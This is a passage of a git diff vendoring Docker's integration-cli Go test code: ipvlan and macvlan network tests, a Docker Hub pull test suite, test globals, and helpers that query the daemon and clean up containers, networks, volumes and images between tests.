assertNwIsAvailable(c, "di-nil-parent-l3") + + // start two containers on separate subnets + dockerCmd(c, "run", "-d", "--ip=172.28.220.10", "--net=di-nil-parent-l3", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + dockerCmd(c, "run", "-d", "--ip=172.28.230.10", "--net=di-nil-parent-l3", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + + // intra-network communications should succeed + _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) +} + +func (s *DockerSuite) TestDockerNetworkIpvlanL3InternalMode(c *check.C) { + // ipvlan l3 mode --internal containers can communicate inside the network but not externally + testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + dockerCmd(c, "network", "create", "--driver=ipvlan", "--subnet=172.28.230.0/24", + "--subnet=172.28.220.0/24", "-o", "ipvlan_mode=l3", "--internal", "di-internal-l3") + assertNwIsAvailable(c, "di-internal-l3") + nr := getNetworkResource(c, "di-internal-l3") + c.Assert(nr.Internal, checker.True) + + // start two containers on separate subnets + dockerCmd(c, "run", "-d", "--ip=172.28.220.10", "--net=di-internal-l3", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + dockerCmd(c, "run", "-d", "--ip=172.28.230.10", "--net=di-internal-l3", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + + // access outside of the network should fail + result := dockerCmdWithTimeout(time.Second, "exec", "first", "ping", "-c", "1", "-w", "1", "8.8.8.8") + c.Assert(result, icmd.Matches, icmd.Expected{Timeout: true}) + // intra-network communications should succeed + _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) +} + +func (s *DockerSuite) TestDockerNetworkMacVlanExistingParent(c *check.C) { + // macvlan bridge mode - empty parent interface containers 
can reach each other internally but not externally + testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + netName := "dm-parent-exists" + out, err := createMasterDummy(c, "dm-dummy0") + //out, err := createVlanInterface(c, "dm-parent", "dm-slave", "macvlan", "bridge") + c.Assert(err, check.IsNil, check.Commentf(out)) + // create a network using an existing parent interface + dockerCmd(c, "network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0", netName) + assertNwIsAvailable(c, netName) + // delete the network while preserving the parent link + dockerCmd(c, "network", "rm", netName) + assertNwNotAvailable(c, netName) + // verify the network delete did not delete the predefined link + out, err = linkExists(c, "dm-dummy0") + c.Assert(err, check.IsNil, check.Commentf(out)) + deleteInterface(c, "dm-dummy0") + c.Assert(err, check.IsNil, check.Commentf(out)) +} + +func (s *DockerSuite) TestDockerNetworkMacVlanSubinterface(c *check.C) { + // macvlan bridge mode - empty parent interface containers can reach each other internally but not externally + testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) + netName := "dm-subinterface" + out, err := createMasterDummy(c, "dm-dummy0") + c.Assert(err, check.IsNil, check.Commentf(out)) + out, err = createVlanInterface(c, "dm-dummy0", "dm-dummy0.20", "20") + c.Assert(err, check.IsNil, check.Commentf(out)) + // create a network using an existing parent interface + dockerCmd(c, "network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0.20", netName) + assertNwIsAvailable(c, netName) + + // start containers on 802.1q tagged '-o parent' sub-interface + dockerCmd(c, "run", "-d", "--net=dm-subinterface", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + dockerCmd(c, "run", "-d", "--net=dm-subinterface", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + // verify containers 
can communicate + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) + + // remove the containers + dockerCmd(c, "rm", "-f", "first") + dockerCmd(c, "rm", "-f", "second") + // delete the network while preserving the parent link + dockerCmd(c, "network", "rm", netName) + assertNwNotAvailable(c, netName) + // verify the network delete did not delete the predefined sub-interface + out, err = linkExists(c, "dm-dummy0.20") + c.Assert(err, check.IsNil, check.Commentf(out)) + // delete the parent interface which also collects the slave + deleteInterface(c, "dm-dummy0") + c.Assert(err, check.IsNil, check.Commentf(out)) +} + +func createMasterDummy(c *check.C, master string) (string, error) { + // ip link add type dummy + args := []string{"link", "add", master, "type", "dummy"} + ipLinkCmd := exec.Command("ip", args...) + out, _, err := runCommandWithOutput(ipLinkCmd) + if err != nil { + return out, err + } + // ip link set dummy_name up + args = []string{"link", "set", master, "up"} + ipLinkCmd = exec.Command("ip", args...) + out, _, err = runCommandWithOutput(ipLinkCmd) + if err != nil { + return out, err + } + return out, err +} + +func createVlanInterface(c *check.C, master, slave, id string) (string, error) { + // ip link add link name . type vlan id + args := []string{"link", "add", "link", master, "name", slave, "type", "vlan", "id", id} + ipLinkCmd := exec.Command("ip", args...) + out, _, err := runCommandWithOutput(ipLinkCmd) + if err != nil { + return out, err + } + // ip link set up + args = []string{"link", "set", slave, "up"} + ipLinkCmd = exec.Command("ip", args...) + out, _, err = runCommandWithOutput(ipLinkCmd) + if err != nil { + return out, err + } + return out, err +} + +func linkExists(c *check.C, master string) (string, error) { + // verify the specified link exists, ip link show + args := []string{"link", "show", master} + ipLinkCmd := exec.Command("ip", args...) 
+ out, _, err := runCommandWithOutput(ipLinkCmd) + if err != nil { + return out, err + } + return out, err +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_hub_pull_suite_test.go b/vendor/github.com/docker/docker/integration-cli/docker_hub_pull_suite_test.go new file mode 100644 index 0000000000..df52cae1a4 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_hub_pull_suite_test.go @@ -0,0 +1,90 @@ +package main + +import ( + "os/exec" + "runtime" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func init() { + // FIXME. Temporarily turning this off for Windows as GH16039 was breaking + // Windows to Linux CI @icecrime + if runtime.GOOS != "windows" { + check.Suite(newDockerHubPullSuite()) + } +} + +// DockerHubPullSuite provides an isolated daemon that doesn't have all the +// images that are baked into our 'global' test environment daemon (e.g., +// busybox, httpserver, ...). +// +// We use it for push/pull tests where we want to start fresh, and measure the +// relative impact of each individual operation. As part of this suite, all +// images are removed after each test. +type DockerHubPullSuite struct { + d *Daemon + ds *DockerSuite +} + +// newDockerHubPullSuite returns a new instance of a DockerHubPullSuite. +func newDockerHubPullSuite() *DockerHubPullSuite { + return &DockerHubPullSuite{ + ds: &DockerSuite{}, + } +} + +// SetUpSuite starts the suite daemon. +func (s *DockerHubPullSuite) SetUpSuite(c *check.C) { + testRequires(c, DaemonIsLinux) + s.d = NewDaemon(c) + err := s.d.Start() + c.Assert(err, checker.IsNil, check.Commentf("starting push/pull test daemon: %v", err)) +} + +// TearDownSuite stops the suite daemon. 
+func (s *DockerHubPullSuite) TearDownSuite(c *check.C) { + if s.d != nil { + err := s.d.Stop() + c.Assert(err, checker.IsNil, check.Commentf("stopping push/pull test daemon: %v", err)) + } +} + +// SetUpTest declares that all tests of this suite require network. +func (s *DockerHubPullSuite) SetUpTest(c *check.C) { + testRequires(c, Network) +} + +// TearDownTest removes all images from the suite daemon. +func (s *DockerHubPullSuite) TearDownTest(c *check.C) { + out := s.Cmd(c, "images", "-aq") + images := strings.Split(out, "\n") + images = append([]string{"rmi", "-f"}, images...) + s.d.Cmd(images...) + s.ds.TearDownTest(c) +} + +// Cmd executes a command against the suite daemon and returns the combined +// output. The function fails the test when the command returns an error. +func (s *DockerHubPullSuite) Cmd(c *check.C, name string, arg ...string) string { + out, err := s.CmdWithError(name, arg...) + c.Assert(err, checker.IsNil, check.Commentf("%q failed with errors: %s, %v", strings.Join(arg, " "), out, err)) + return out +} + +// CmdWithError executes a command against the suite daemon and returns the +// combined output as well as any error. +func (s *DockerHubPullSuite) CmdWithError(name string, arg ...string) (string, error) { + c := s.MakeCmd(name, arg...) + b, err := c.CombinedOutput() + return string(b), err +} + +// MakeCmd returns an exec.Cmd command to run against the suite daemon. +func (s *DockerHubPullSuite) MakeCmd(name string, arg ...string) *exec.Cmd { + args := []string{"--host", s.d.sock(), name} + args = append(args, arg...) + return exec.Command(dockerBinary, args...) 
+} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_test_vars.go b/vendor/github.com/docker/docker/integration-cli/docker_test_vars.go new file mode 100644 index 0000000000..3559bfdbb7 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_test_vars.go @@ -0,0 +1,165 @@ +package main + +import ( + "encoding/json" + "fmt" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "strconv" + + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/pkg/reexec" +) + +var ( + // the docker client binary to use + dockerBinary = "docker" + // the docker daemon binary to use + dockerdBinary = "dockerd" + + // path to containerd's ctr binary + ctrBinary = "docker-containerd-ctr" + + // the private registry image to use for tests involving the registry + registryImageName = "registry" + + // the private registry to use for tests + privateRegistryURL = "127.0.0.1:5000" + + // TODO Windows CI. These are incorrect and need fixing into + // platform specific pieces. + runtimePath = "/var/run/docker" + + workingDirectory string + + // isLocalDaemon is true if the daemon under test is on the same + // host as the CLI. + isLocalDaemon bool + + // daemonPlatform is held globally so that tests can make intelligent + // decisions on how to configure themselves according to the platform + // of the daemon. This is initialized in docker_utils by sending + // a version call to the daemon and examining the response header. + daemonPlatform string + + // windowsDaemonKV is used on Windows to distinguish between different + // versions. This is necessary to enable certain tests based on whether + // the platform supports it. For example, Windows Server 2016 TP3 did + // not support volumes, but TP4 did. + windowsDaemonKV int + + // daemonDefaultImage is the name of the default image to use when running + // tests. This is platform dependent. 
+ daemonDefaultImage string + + // For a local daemon on Linux, these values will be used for testing + // user namespace support as the standard graph path(s) will be + // appended with the root remapped uid.gid prefix + dockerBasePath string + volumesConfigPath string + containerStoragePath string + + // experimentalDaemon tell whether the main daemon has + // experimental features enabled or not + experimentalDaemon bool + + // daemonStorageDriver is held globally so that tests can know the storage + // driver of the daemon. This is initialized in docker_utils by sending + // a version call to the daemon and examining the response header. + daemonStorageDriver string + + // WindowsBaseImage is the name of the base image for Windows testing + // Environment variable WINDOWS_BASE_IMAGE can override this + WindowsBaseImage = "microsoft/windowsservercore" + + // isolation is the isolation mode of the daemon under test + isolation container.Isolation + + // daemonPid is the pid of the main test daemon + daemonPid int + + daemonKernelVersion string +) + +const ( + // DefaultImage is the name of the base image for the majority of tests that + // are run across suites + DefaultImage = "busybox" +) + +func init() { + reexec.Init() + if dockerBin := os.Getenv("DOCKER_BINARY"); dockerBin != "" { + dockerBinary = dockerBin + } + var err error + dockerBinary, err = exec.LookPath(dockerBinary) + if err != nil { + fmt.Printf("ERROR: couldn't resolve full path to the Docker binary (%v)\n", err) + os.Exit(1) + } + if registryImage := os.Getenv("REGISTRY_IMAGE"); registryImage != "" { + registryImageName = registryImage + } + if registry := os.Getenv("REGISTRY_URL"); registry != "" { + privateRegistryURL = registry + } + workingDirectory, _ = os.Getwd() + + // Deterministically working out the environment in which CI is running + // to evaluate whether the daemon is local or remote is not possible through + // a build tag. 
+ // + // For example Windows to Linux CI under Jenkins tests the 64-bit + // Windows binary build with the daemon build tag, but calls a remote + // Linux daemon. + // + // We can't just say if Windows then assume the daemon is local as at + // some point, we will be testing the Windows CLI against a Windows daemon. + // + // Similarly, it will be perfectly valid to also run CLI tests from + // a Linux CLI (built with the daemon tag) against a Windows daemon. + if len(os.Getenv("DOCKER_REMOTE_DAEMON")) > 0 { + isLocalDaemon = false + } else { + isLocalDaemon = true + } + + // TODO Windows CI. This are incorrect and need fixing into + // platform specific pieces. + // This is only used for a tests with local daemon true (Linux-only today) + // default is "/var/lib/docker", but we'll try and ask the + // /info endpoint for the specific root dir + dockerBasePath = "/var/lib/docker" + type Info struct { + DockerRootDir string + ExperimentalBuild bool + KernelVersion string + } + var i Info + status, b, err := sockRequest("GET", "/info", nil) + if err == nil && status == 200 { + if err = json.Unmarshal(b, &i); err == nil { + dockerBasePath = i.DockerRootDir + experimentalDaemon = i.ExperimentalBuild + daemonKernelVersion = i.KernelVersion + } + } + volumesConfigPath = dockerBasePath + "/volumes" + containerStoragePath = dockerBasePath + "/containers" + + if len(os.Getenv("WINDOWS_BASE_IMAGE")) > 0 { + WindowsBaseImage = os.Getenv("WINDOWS_BASE_IMAGE") + fmt.Println("INFO: Windows Base image is ", WindowsBaseImage) + } + + dest := os.Getenv("DEST") + b, err = ioutil.ReadFile(filepath.Join(dest, "docker.pid")) + if err == nil { + if p, err := strconv.ParseInt(string(b), 10, 32); err == nil { + daemonPid = int(p) + } + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_utils.go b/vendor/github.com/docker/docker/integration-cli/docker_utils.go new file mode 100644 index 0000000000..749e4b3357 --- /dev/null +++ 
b/vendor/github.com/docker/docker/integration-cli/docker_utils.go @@ -0,0 +1,1607 @@ +package main + +import ( + "bufio" + "bytes" + "crypto/tls" + "encoding/json" + "errors" + "fmt" + "io" + "io/ioutil" + "net" + "net/http" + "net/http/httptest" + "net/http/httputil" + "net/url" + "os" + "os/exec" + "path" + "path/filepath" + "strconv" + "strings" + "time" + + "github.com/docker/docker/api/types" + volumetypes "github.com/docker/docker/api/types/volume" + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/httputils" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/stringutils" + "github.com/docker/go-connections/tlsconfig" + units "github.com/docker/go-units" + "github.com/go-check/check" +) + +func init() { + cmd := exec.Command(dockerBinary, "images", "-f", "dangling=false", "--format", "{{.Repository}}:{{.Tag}}") + cmd.Env = appendBaseEnv(true) + out, err := cmd.CombinedOutput() + if err != nil { + panic(fmt.Errorf("err=%v\nout=%s\n", err, out)) + } + images := strings.Split(strings.TrimSpace(string(out)), "\n") + for _, img := range images { + protectedImages[img] = struct{}{} + } + + res, body, err := sockRequestRaw("GET", "/info", nil, "application/json") + if err != nil { + panic(fmt.Errorf("Init failed to get /info: %v", err)) + } + defer body.Close() + if res.StatusCode != http.StatusOK { + panic(fmt.Errorf("Init failed to get /info. Res=%v", res)) + } + + svrHeader, _ := httputils.ParseServerHeader(res.Header.Get("Server")) + daemonPlatform = svrHeader.OS + if daemonPlatform != "linux" && daemonPlatform != "windows" { + panic("Cannot run tests against platform: " + daemonPlatform) + } + + // Now we know the daemon platform, can set paths used by tests. 
+ var info types.Info + err = json.NewDecoder(body).Decode(&info) + if err != nil { + panic(fmt.Errorf("Init failed to unmarshal docker info: %v", err)) + } + + daemonStorageDriver = info.Driver + dockerBasePath = info.DockerRootDir + volumesConfigPath = filepath.Join(dockerBasePath, "volumes") + containerStoragePath = filepath.Join(dockerBasePath, "containers") + // Make sure in context of daemon, not the local platform. Note we can't + // use filepath.FromSlash or ToSlash here as they are a no-op on Unix. + if daemonPlatform == "windows" { + volumesConfigPath = strings.Replace(volumesConfigPath, `/`, `\`, -1) + containerStoragePath = strings.Replace(containerStoragePath, `/`, `\`, -1) + // On Windows, extract out the version as we need to make selective + // decisions during integration testing as and when features are implemented. + // eg in "10.0 10550 (10550.1000.amd64fre.branch.date-time)" we want 10550 + windowsDaemonKV, _ = strconv.Atoi(strings.Split(info.KernelVersion, " ")[1]) + } else { + volumesConfigPath = strings.Replace(volumesConfigPath, `\`, `/`, -1) + containerStoragePath = strings.Replace(containerStoragePath, `\`, `/`, -1) + } + isolation = info.Isolation +} + +func convertBasesize(basesizeBytes int64) (int64, error) { + basesize := units.HumanSize(float64(basesizeBytes)) + basesize = strings.Trim(basesize, " ")[:len(basesize)-3] + basesizeFloat, err := strconv.ParseFloat(strings.Trim(basesize, " "), 64) + if err != nil { + return 0, err + } + return int64(basesizeFloat) * 1024 * 1024 * 1024, nil +} + +func daemonHost() string { + daemonURLStr := "unix://" + opts.DefaultUnixSocket + if daemonHostVar := os.Getenv("DOCKER_HOST"); daemonHostVar != "" { + daemonURLStr = daemonHostVar + } + return daemonURLStr +} + +func getTLSConfig() (*tls.Config, error) { + dockerCertPath := os.Getenv("DOCKER_CERT_PATH") + + if dockerCertPath == "" { + return nil, fmt.Errorf("DOCKER_TLS_VERIFY specified, but no DOCKER_CERT_PATH environment variable") + } + + 
option := &tlsconfig.Options{ + CAFile: filepath.Join(dockerCertPath, "ca.pem"), + CertFile: filepath.Join(dockerCertPath, "cert.pem"), + KeyFile: filepath.Join(dockerCertPath, "key.pem"), + } + tlsConfig, err := tlsconfig.Client(*option) + if err != nil { + return nil, err + } + + return tlsConfig, nil +} + +func sockConn(timeout time.Duration, daemon string) (net.Conn, error) { + if daemon == "" { + daemon = daemonHost() + } + daemonURL, err := url.Parse(daemon) + if err != nil { + return nil, fmt.Errorf("could not parse url %q: %v", daemon, err) + } + + var c net.Conn + switch daemonURL.Scheme { + case "npipe": + return npipeDial(daemonURL.Path, timeout) + case "unix": + return net.DialTimeout(daemonURL.Scheme, daemonURL.Path, timeout) + case "tcp": + if os.Getenv("DOCKER_TLS_VERIFY") != "" { + // Setup the socket TLS configuration. + tlsConfig, err := getTLSConfig() + if err != nil { + return nil, err + } + dialer := &net.Dialer{Timeout: timeout} + return tls.DialWithDialer(dialer, daemonURL.Scheme, daemonURL.Host, tlsConfig) + } + return net.DialTimeout(daemonURL.Scheme, daemonURL.Host, timeout) + default: + return c, fmt.Errorf("unknown scheme %v (%s)", daemonURL.Scheme, daemon) + } +} + +func sockRequest(method, endpoint string, data interface{}) (int, []byte, error) { + jsonData := bytes.NewBuffer(nil) + if err := json.NewEncoder(jsonData).Encode(data); err != nil { + return -1, nil, err + } + + res, body, err := sockRequestRaw(method, endpoint, jsonData, "application/json") + if err != nil { + return -1, nil, err + } + b, err := readBody(body) + return res.StatusCode, b, err +} + +func sockRequestRaw(method, endpoint string, data io.Reader, ct string) (*http.Response, io.ReadCloser, error) { + return sockRequestRawToDaemon(method, endpoint, data, ct, "") +} + +func sockRequestRawToDaemon(method, endpoint string, data io.Reader, ct, daemon string) (*http.Response, io.ReadCloser, error) { + req, client, err := newRequestClient(method, endpoint, data, ct, 
daemon) + if err != nil { + return nil, nil, err + } + + resp, err := client.Do(req) + if err != nil { + client.Close() + return nil, nil, err + } + body := ioutils.NewReadCloserWrapper(resp.Body, func() error { + defer resp.Body.Close() + return client.Close() + }) + + return resp, body, nil +} + +func sockRequestHijack(method, endpoint string, data io.Reader, ct string) (net.Conn, *bufio.Reader, error) { + req, client, err := newRequestClient(method, endpoint, data, ct, "") + if err != nil { + return nil, nil, err + } + + client.Do(req) + conn, br := client.Hijack() + return conn, br, nil +} + +func newRequestClient(method, endpoint string, data io.Reader, ct, daemon string) (*http.Request, *httputil.ClientConn, error) { + c, err := sockConn(time.Duration(10*time.Second), daemon) + if err != nil { + return nil, nil, fmt.Errorf("could not dial docker daemon: %v", err) + } + + client := httputil.NewClientConn(c, nil) + + req, err := http.NewRequest(method, endpoint, data) + if err != nil { + client.Close() + return nil, nil, fmt.Errorf("could not create new request: %v", err) + } + + if ct != "" { + req.Header.Set("Content-Type", ct) + } + return req, client, nil +} + +func readBody(b io.ReadCloser) ([]byte, error) { + defer b.Close() + return ioutil.ReadAll(b) +} + +func deleteContainer(container ...string) error { + result := icmd.RunCommand(dockerBinary, append([]string{"rm", "-fv"}, container...)...) 
+ return result.Compare(icmd.Success) +} + +func getAllContainers() (string, error) { + getContainersCmd := exec.Command(dockerBinary, "ps", "-q", "-a") + out, exitCode, err := runCommandWithOutput(getContainersCmd) + if exitCode != 0 && err == nil { + err = fmt.Errorf("failed to get a list of containers: %v\n", out) + } + + return out, err +} + +func deleteAllContainers() error { + containers, err := getAllContainers() + if err != nil { + fmt.Println(containers) + return err + } + if containers == "" { + return nil + } + + err = deleteContainer(strings.Split(strings.TrimSpace(containers), "\n")...) + if err != nil { + fmt.Println(err.Error()) + } + return err +} + +func deleteAllNetworks() error { + networks, err := getAllNetworks() + if err != nil { + return err + } + var errors []string + for _, n := range networks { + if n.Name == "bridge" || n.Name == "none" || n.Name == "host" { + continue + } + if daemonPlatform == "windows" && strings.ToLower(n.Name) == "nat" { + // nat is a pre-defined network on Windows and cannot be removed + continue + } + status, b, err := sockRequest("DELETE", "/networks/"+n.Name, nil) + if err != nil { + errors = append(errors, err.Error()) + continue + } + if status != http.StatusNoContent { + errors = append(errors, fmt.Sprintf("error deleting network %s: %s", n.Name, string(b))) + } + } + if len(errors) > 0 { + return fmt.Errorf(strings.Join(errors, "\n")) + } + return nil +} + +func getAllNetworks() ([]types.NetworkResource, error) { + var networks []types.NetworkResource + _, b, err := sockRequest("GET", "/networks", nil) + if err != nil { + return nil, err + } + if err := json.Unmarshal(b, &networks); err != nil { + return nil, err + } + return networks, nil +} + +func deleteAllPlugins() error { + plugins, err := getAllPlugins() + if err != nil { + return err + } + var errors []string + for _, p := range plugins { + status, b, err := sockRequest("DELETE", "/plugins/"+p.Name+"?force=1", nil) + if err != nil { + errors = 
append(errors, err.Error()) + continue + } + if status != http.StatusNoContent { + errors = append(errors, fmt.Sprintf("error deleting plugin %s: %s", p.Name, string(b))) + } + } + if len(errors) > 0 { + return fmt.Errorf(strings.Join(errors, "\n")) + } + return nil +} + +func getAllPlugins() (types.PluginsListResponse, error) { + var plugins types.PluginsListResponse + _, b, err := sockRequest("GET", "/plugins", nil) + if err != nil { + return nil, err + } + if err := json.Unmarshal(b, &plugins); err != nil { + return nil, err + } + return plugins, nil +} + +func deleteAllVolumes() error { + volumes, err := getAllVolumes() + if err != nil { + return err + } + var errors []string + for _, v := range volumes { + status, b, err := sockRequest("DELETE", "/volumes/"+v.Name, nil) + if err != nil { + errors = append(errors, err.Error()) + continue + } + if status != http.StatusNoContent { + errors = append(errors, fmt.Sprintf("error deleting volume %s: %s", v.Name, string(b))) + } + } + if len(errors) > 0 { + return fmt.Errorf(strings.Join(errors, "\n")) + } + return nil +} + +func getAllVolumes() ([]*types.Volume, error) { + var volumes volumetypes.VolumesListOKBody + _, b, err := sockRequest("GET", "/volumes", nil) + if err != nil { + return nil, err + } + if err := json.Unmarshal(b, &volumes); err != nil { + return nil, err + } + return volumes.Volumes, nil +} + +var protectedImages = map[string]struct{}{} + +func deleteAllImages() error { + cmd := exec.Command(dockerBinary, "images") + cmd.Env = appendBaseEnv(true) + out, err := cmd.CombinedOutput() + if err != nil { + return err + } + lines := strings.Split(string(out), "\n")[1:] + var imgs []string + for _, l := range lines { + if l == "" { + continue + } + fields := strings.Fields(l) + imgTag := fields[0] + ":" + fields[1] + if _, ok := protectedImages[imgTag]; !ok { + if fields[0] == "" { + imgs = append(imgs, fields[2]) + continue + } + imgs = append(imgs, imgTag) + } + } + if len(imgs) == 0 { + return nil + } + 
args := append([]string{"rmi", "-f"}, imgs...) + if err := exec.Command(dockerBinary, args...).Run(); err != nil { + return err + } + return nil +} + +func getPausedContainers() (string, error) { + getPausedContainersCmd := exec.Command(dockerBinary, "ps", "-f", "status=paused", "-q", "-a") + out, exitCode, err := runCommandWithOutput(getPausedContainersCmd) + if exitCode != 0 && err == nil { + err = fmt.Errorf("failed to get a list of paused containers: %v\n", out) + } + + return out, err +} + +func getSliceOfPausedContainers() ([]string, error) { + out, err := getPausedContainers() + if err == nil { + if len(out) == 0 { + return nil, err + } + slice := strings.Split(strings.TrimSpace(out), "\n") + return slice, err + } + return []string{out}, err +} + +func unpauseContainer(container string) error { + return icmd.RunCommand(dockerBinary, "unpause", container).Error +} + +func unpauseAllContainers() error { + containers, err := getPausedContainers() + if err != nil { + fmt.Println(containers) + return err + } + + containers = strings.Replace(containers, "\n", " ", -1) + containers = strings.Trim(containers, " ") + containerList := strings.Split(containers, " ") + + for _, value := range containerList { + if err = unpauseContainer(value); err != nil { + return err + } + } + + return nil +} + +func deleteImages(images ...string) error { + args := []string{dockerBinary, "rmi", "-f"} + return icmd.RunCmd(icmd.Cmd{Command: append(args, images...)}).Error +} + +func imageExists(image string) error { + return icmd.RunCommand(dockerBinary, "inspect", image).Error +} + +func pullImageIfNotExist(image string) error { + if err := imageExists(image); err != nil { + pullCmd := exec.Command(dockerBinary, "pull", image) + _, exitCode, err := runCommandWithOutput(pullCmd) + + if err != nil || exitCode != 0 { + return fmt.Errorf("image %q wasn't found locally and it couldn't be pulled: %s", image, err) + } + } + return nil +} + +func dockerCmdWithError(args ...string) (string, 
int, error) { + if err := validateArgs(args...); err != nil { + return "", 0, err + } + result := icmd.RunCommand(dockerBinary, args...) + if result.Error != nil { + return result.Combined(), result.ExitCode, result.Compare(icmd.Success) + } + return result.Combined(), result.ExitCode, result.Error +} + +func dockerCmdWithStdoutStderr(c *check.C, args ...string) (string, string, int) { + if err := validateArgs(args...); err != nil { + c.Fatalf(err.Error()) + } + + result := icmd.RunCommand(dockerBinary, args...) + // TODO: why is c ever nil? + if c != nil { + c.Assert(result, icmd.Matches, icmd.Success) + } + return result.Stdout(), result.Stderr(), result.ExitCode +} + +func dockerCmd(c *check.C, args ...string) (string, int) { + if err := validateArgs(args...); err != nil { + c.Fatalf(err.Error()) + } + result := icmd.RunCommand(dockerBinary, args...) + c.Assert(result, icmd.Matches, icmd.Success) + return result.Combined(), result.ExitCode +} + +func dockerCmdWithResult(args ...string) *icmd.Result { + return icmd.RunCommand(dockerBinary, args...) +} + +func binaryWithArgs(args ...string) []string { + return append([]string{dockerBinary}, args...) 
+} + +// execute a docker command with a timeout +func dockerCmdWithTimeout(timeout time.Duration, args ...string) *icmd.Result { + if err := validateArgs(args...); err != nil { + return &icmd.Result{Error: err} + } + return icmd.RunCmd(icmd.Cmd{Command: binaryWithArgs(args...), Timeout: timeout}) +} + +// execute a docker command in a directory +func dockerCmdInDir(c *check.C, path string, args ...string) (string, int, error) { + if err := validateArgs(args...); err != nil { + c.Fatalf(err.Error()) + } + result := icmd.RunCmd(icmd.Cmd{Command: binaryWithArgs(args...), Dir: path}) + return result.Combined(), result.ExitCode, result.Error +} + +// execute a docker command in a directory with a timeout +func dockerCmdInDirWithTimeout(timeout time.Duration, path string, args ...string) *icmd.Result { + if err := validateArgs(args...); err != nil { + return &icmd.Result{Error: err} + } + return icmd.RunCmd(icmd.Cmd{ + Command: binaryWithArgs(args...), + Timeout: timeout, + Dir: path, + }) +} + +// validateArgs is a checker to ensure tests are not running commands which are +// not supported on platforms. Specifically on Windows this is 'busybox top'. +func validateArgs(args ...string) error { + if daemonPlatform != "windows" { + return nil + } + foundBusybox := -1 + for key, value := range args { + if strings.ToLower(value) == "busybox" { + foundBusybox = key + } + if (foundBusybox != -1) && (key == foundBusybox+1) && (strings.ToLower(value) == "top") { + return errors.New("cannot use 'busybox top' in tests on Windows. Use runSleepingContainer()") + } + } + return nil +} + +// find the State.ExitCode in container metadata +func findContainerExitCode(c *check.C, name string, vargs ...string) string { + args := append(vargs, "inspect", "--format='{{ .State.ExitCode }} {{ .State.Error }}'", name) + cmd := exec.Command(dockerBinary, args...) 
+ out, _, err := runCommandWithOutput(cmd) + if err != nil { + c.Fatal(err, out) + } + return out +} + +func findContainerIP(c *check.C, id string, network string) string { + out, _ := dockerCmd(c, "inspect", fmt.Sprintf("--format='{{ .NetworkSettings.Networks.%s.IPAddress }}'", network), id) + return strings.Trim(out, " \r\n'") +} + +func getContainerCount() (int, error) { + const containers = "Containers:" + + cmd := exec.Command(dockerBinary, "info") + out, _, err := runCommandWithOutput(cmd) + if err != nil { + return 0, err + } + + lines := strings.Split(out, "\n") + for _, line := range lines { + if strings.Contains(line, containers) { + output := strings.TrimSpace(line) + output = strings.TrimLeft(output, containers) + output = strings.Trim(output, " ") + containerCount, err := strconv.Atoi(output) + if err != nil { + return 0, err + } + return containerCount, nil + } + } + return 0, fmt.Errorf("couldn't find the Container count in the output") +} + +// FakeContext creates directories that can be used as a build context +type FakeContext struct { + Dir string +} + +// Add a file at a path, creating directories where necessary +func (f *FakeContext) Add(file, content string) error { + return f.addFile(file, []byte(content)) +} + +func (f *FakeContext) addFile(file string, content []byte) error { + fp := filepath.Join(f.Dir, filepath.FromSlash(file)) + dirpath := filepath.Dir(fp) + if dirpath != "." 
{ + if err := os.MkdirAll(dirpath, 0755); err != nil { + return err + } + } + return ioutil.WriteFile(fp, content, 0644) + +} + +// Delete a file at a path +func (f *FakeContext) Delete(file string) error { + fp := filepath.Join(f.Dir, filepath.FromSlash(file)) + return os.RemoveAll(fp) +} + +// Close deletes the context +func (f *FakeContext) Close() error { + return os.RemoveAll(f.Dir) +} + +func fakeContextFromNewTempDir() (*FakeContext, error) { + tmp, err := ioutil.TempDir("", "fake-context") + if err != nil { + return nil, err + } + if err := os.Chmod(tmp, 0755); err != nil { + return nil, err + } + return fakeContextFromDir(tmp), nil +} + +func fakeContextFromDir(dir string) *FakeContext { + return &FakeContext{dir} +} + +func fakeContextWithFiles(files map[string]string) (*FakeContext, error) { + ctx, err := fakeContextFromNewTempDir() + if err != nil { + return nil, err + } + for file, content := range files { + if err := ctx.Add(file, content); err != nil { + ctx.Close() + return nil, err + } + } + return ctx, nil +} + +func fakeContextAddDockerfile(ctx *FakeContext, dockerfile string) error { + if err := ctx.Add("Dockerfile", dockerfile); err != nil { + ctx.Close() + return err + } + return nil +} + +func fakeContext(dockerfile string, files map[string]string) (*FakeContext, error) { + ctx, err := fakeContextWithFiles(files) + if err != nil { + return nil, err + } + if err := fakeContextAddDockerfile(ctx, dockerfile); err != nil { + return nil, err + } + return ctx, nil +} + +// FakeStorage is a static file server. It might be running locally or remotely +// on test host. 
